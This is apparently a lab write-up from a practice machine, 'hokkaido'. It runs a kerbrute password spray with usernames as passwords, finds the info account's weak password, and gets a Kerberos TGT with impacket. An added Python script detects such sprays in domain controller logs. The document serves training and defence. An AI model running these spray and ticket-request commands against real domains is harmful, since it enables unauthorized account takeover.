Password Spray
3 valid domain users have been discovered through a brute-force attack against the target KDC service. While no password is known at this time, I will attempt to perform a password spraying attack with their username as password.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ kerbrute passwordspray --dc dc.hokkaido-aerospace.com -d HOKKAIDO-AEROSPACE.COM --user-as-pass ./users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/25/25 - Ronnie Flathers @ropnop
2025/04/25 14:49:25 > Using KDC(s):
2025/04/25 14:49:25 > dc.hokkaido-aerospace.com:88
2025/04/25 14:49:26 > [+] VALID LOGIN: info@HOKKAIDO-AEROSPACE.COM:info
2025/04/25 14:49:26 > Done! Tested 4 logins (1 successes) in 0.121 seconds
Performing a password spraying attack with the --user-as-pass flag to test username as password
The info account has its password set to info
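On the domain controller, a spray like the one above appears as a burst of Kerberos AS-REQ results from one source across several accounts, which is what a detection rule can key on. The following is an added example, not part of the original notes: event IDs 4771/4768 and status 0x18 are the standard Windows Security log values, while the sample events, source addresses, user.* account names and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S.%f"

# Constructed sample events: (time, event_id, account, source_ip, status).
# 4771 = Kerberos pre-authentication failed (0x18 = bad password), 4768 = TGT issued.
EVENTS = [
    ("2025-04-25 14:49:26.010", 4771, "user.a", "192.0.2.50", "0x18"),
    ("2025-04-25 14:49:26.040", 4771, "user.b", "192.0.2.50", "0x18"),
    ("2025-04-25 14:49:26.070", 4768, "info", "192.0.2.50", "0x0"),
    ("2025-04-25 14:49:26.100", 4771, "user.c", "192.0.2.50", "0x18"),
    # Benign noise: one user mistyping their own password from their workstation.
    ("2025-04-25 14:50:01.000", 4771, "user.a", "192.0.2.21", "0x18"),
    ("2025-04-25 14:50:05.000", 4771, "user.a", "192.0.2.21", "0x18"),
    ("2025-04-25 14:50:09.000", 4771, "user.a", "192.0.2.21", "0x18"),
]

def detect_spray(events, window=timedelta(seconds=60), min_accounts=3):
    """Flag sources whose AS-REQ results span many distinct accounts in one window."""
    by_src = defaultdict(list)
    for ts, eid, account, src, status in events:
        if (eid, status) in ((4771, "0x18"), (4768, "0x0")):
            by_src[src].append((datetime.strptime(ts, FMT), eid, account.lower()))
    alerts = []
    for src, rows in sorted(by_src.items()):
        rows.sort()
        best, start = [], 0
        for end in range(len(rows)):
            # Shrink the window from the left until it fits the time limit.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            span = rows[start:end + 1]
            if len({a for _, _, a in span}) > len({a for _, _, a in best}):
                best = span
        failed = {a for _, e, a in best if e == 4771}
        succeeded = {a for _, e, a in best if e == 4768}
        # Many accounts, few attempts each, at least one failure: spray pattern.
        if failed and len(failed | succeeded) >= min_accounts:
            alerts.append({"source": src, "failed": sorted(failed),
                           "succeeded": sorted(succeeded)})
    return alerts

if __name__ == "__main__":
    for alert in detect_spray(EVENTS):
        print(alert)
```

Accounts listed under `succeeded` inside a flagged burst are the ones to reset first, since a TGT was issued to the spraying source.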
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/info@dc.hokkaido-aerospace.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: info
[*] Saving ticket in info@dc.hokkaido-aerospace.com.ccache
Validated
TGT generated for the info account